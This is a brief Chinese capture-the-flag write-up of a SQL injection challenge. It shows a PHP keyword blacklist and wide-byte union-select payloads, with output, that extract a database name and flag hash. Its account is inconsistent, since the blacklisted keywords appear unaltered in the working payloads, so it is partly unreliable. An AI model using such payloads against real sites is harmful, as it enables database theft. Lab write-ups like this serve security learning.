SQL注入1(已挂)
因为题目挂了只能还原一下
进入题目
题目要求:
访问参数为:?id=x
查找表为key的数据表,id=1值hash字段值
代码
//过滤sql
$array = array('table','union','and','or','load_file','create','delete','select','update','sleep','alter','drop','truncate','from','max','min','order','limit');
foreach ($array as $value)
{
if (substr_count($id, $value) > 0)
{
exit('包含敏感关键字!'.$value);
}
}
//xss过滤
$id = strip_tags($id);
$query = "SELECT * FROM temp WHERE id={$id} LIMIT 1";
当前结果:
id | 1 |
---|---|
title | title |
方法:
利用宽字节即可
拿到题以后,还是老套路,and 1=1和and 1=2 看看是否带入查询,但是这个题目在?id=1和?id=1’两种条件下都不报错,查看页面源代码发现gb2312于是尝试宽字节注入。?id=1%bf’ union select 1,2%23 来确定回显
?id=1%df%27%20union%20select%201,2%23
Payload和回显的结果
1.?id=1%bf’ union select 1,database()%23查询数据库名称为sql5
id | 1 |
---|---|
key | fdsafdasfdsa |
id | 1 |
key | sql5 |
2.?id=1%bf’ union select 1,string from sql5.key%23 然后查询key表,id=1的string字段。
id | 1 |
---|---|
key | fdsafdasfdsa |
id | 1 |
key | 54f3320dc261f313ba712eb3f13a1f6d |
id | 1 |
key | aaaaaaaaaa |
得到了flag值 54f3320dc261f313ba712eb3f13a1f6d
得到flag,sql注入中的宽字节注入以及绕过等方面的问题会比较容易些,还是要多学习